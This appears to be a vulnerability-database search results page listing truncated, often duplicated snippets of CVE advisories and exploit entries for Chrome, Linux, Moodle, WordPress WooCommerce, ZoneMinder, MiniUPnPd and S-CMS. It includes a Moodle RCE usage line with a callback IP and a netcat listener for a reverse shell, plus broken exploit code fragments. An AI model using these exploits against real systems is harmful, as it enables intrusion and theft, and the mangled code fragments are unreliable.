DEBIAN-CVE-2018-20449

The hidmachanstats function in drivers/dma/qcom/hidmadbg.c in the Linux kernel 4.14.90 allows local users to obtain sensitive address information by reading "callback=" lines in a debugfs file...

Chrome V8TrustedTypePolicyOptions::ToImpl Type Confusion

Chrome: Type confusion in V8TrustedTypePolicyOptions::ToImpl VULNERABILITY DETAILS The binding code generator doesn't add checks to ensure that the callback properties of a dictionary are indeed JS functions. For example, for the the TrustedTypePolicyOptions dictionary:...

Chrome V8TrustedTypePolicyOptions::ToImpl Type Confusion Vulnerability

Chrome: Type confusion in V8TrustedTypePolicyOptions::ToImpl VULNERABILITY DETAILS The binding code generator doesn't add checks to ensure that the callback properties of a dictionary are indeed JS functions. For example, for the the TrustedTypePolicyOptions dictionary:...

Moodle 3.4.1 - Remote Code Execution

php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the teacher Make sure you're running a netcat listener on the...

CVE-2019-9595

AppCMS 2.0.101 allows XSS via the upload/callback.php params parameter...

CVE-2019-9595

AppCMS 2.0.101 allows XSS via the upload/callback.php params parameter...

Google Chrome < M72 - FileWriterImpl Use-After-Free Exploit

Google Chrome GetBlobDataFromBlobPtr std::moveblob, base::BindOnce&FileWriterImpl::DoWrite, base::Unretainedthis, std::movecallback, position; Note that the last argument to GetBlobDataFromBlobPtr is a callback object bound to base::Unretainedthis. And the implementation of GetBlobDataFromBlobPtr...

Google Chrome M72 - RenderFrameHostImpl::CreateMediaStreamDispatcherHost Use-After-Free

Google Chrome M72 - RenderFrameHostImpl::CreateMediaStreamDispatcherHost Use-After-Free There's a race-condition / object-lifetime issue in the browser process when the browser process shutdown races against the IO thread handling mojo messages from the renderer. It's at least possible to trigger...

Google Chrome &lt; M72 - RenderFrameHostImpl::CreateMediaStreamDispatcherHost Use-After-Free

There's a race-condition / object-lifetime issue in the browser process when the browser process shutdown races against the IO thread handling mojo messages from the renderer. It's at least possible to trigger this by closing the browser while running the attached poc; I'm not sure if there's a...

Google Chrome &lt; M72 - FileWriterImpl Use-After-Free

There's a use-after-free in the implementation of the FileWriter component of the mojo bindings for the filesystem API. The browser-process side of this API is defined in https://cs.chromium.org/chromium/src/thirdparty/blink/public/mojom/filesystem/filewriter.mojom?type=cs&sq=package:chromium&g=0...

Hidden for 19 years WinRAR code execution vulnerability-vulnerability warning-the black bar safety net

The researchers found WinRAR logic vulnerabilities that can full access to the victims computer control. The exploit only requires from the compressed file to extract it can work, more than 5 million users affected. More importantly, the vulnerability has been there 19 years, forcing WinRAR...

WordPress WooCommerce GloBee Payment Gateway 1.1.1 Bypass / Spoofing

?php Exploit Title: WordPress WooCommerce - GloBee cryptocurrency Payment Gateway Plugin Payment Bypass / Unauthorized Order Status Spoofing Discovery Date: 14.12.2018 Public Disclosure Date: 14.02.2019 Exploit Author: GeekHack Contact: https://t.me/GeekHack Vendor Homepage: https://globee.com/...

WordPress Plugin WooCommerce - GloBee (cryptocurrency) Payment Gateway 1.1.1 - Payment Bypass / Unauthorized Order Status Spoofing

?php Exploit Title: WordPress WooCommerce - GloBee cryptocurrency Payment Gateway Plugin Payment Bypass / Unauthorized Order Status Spoofing Discovery Date: 14.12.2018 Public Disclosure Date: 14.02.2019 Exploit Author: GeekHack Contact: https://t.me/GeekHack Vendor Homepage: https://globee.com/...

WordPress WooCommerce Plugin - Payment Bypass / Unauthorized Order Status Spoofing

Exploit for php platform in category web applications WordPress Plugin WooCommerce - GloBee cryptocurrency Payment Gateway 1.1.1 - Payment Bypass / Unauthorized Order Status Spoofing -------------------------------------------------------------- ?php Exploit Title: WordPress WooCommerce - GloBee...

CVE-2019-7346

A CSRF check issue exists in ZoneMinder through 1.32.3 as whenever a CSRF check fails, a callback function is called displaying a "Try again" button, which allows resending the failed request, making the CSRF attack successful...

DEBIAN-CVE-2019-7346

A CSRF check issue exists in ZoneMinder through 1.32.3 as whenever a CSRF check fails, a callback function is called displaying a "Try again" button, which allows resending the failed request, making the CSRF attack successful...

UBUNTU-CVE-2019-7346

A CSRF check issue exists in ZoneMinder through 1.32.3 as whenever a CSRF check fails, a callback function is called displaying a "Try again" button, which allows resending the failed request, making the CSRF attack successful...

MiniUPnPd 2.1 - Out-of-Bounds Read

MiniUPnPd 2.1 - Out-of-Bounds Read !/usr/bin/python3 miniupnpd 0: self.server.notify += line line = self.rfile.read1 except: pass self.wfile.writeb"HTTP/1.1 200 OK\r\n\r\n" def splash: print" miniupnpd '.formatargs.callbackip,args.callbackport,callbackuri, 'Timeout': 'Second-20' server =...

CVE-2018-20477

An issue was discovered in S-CMS 3.0. It allows SQL Injection via the bank/callback1.php Pno field...

S-CMS SQL Injection Vulnerability (CNVD-2018-26676)

S-CMS is a content management system CMS based on PHP and MySQL. A SQL injection vulnerability exists in the bank/callback1.php file in S-CMS version 3.0, which stems from the program's failure to filter the 'Pno' field, and can be exploited by remote attackers to execute SQL statements with the...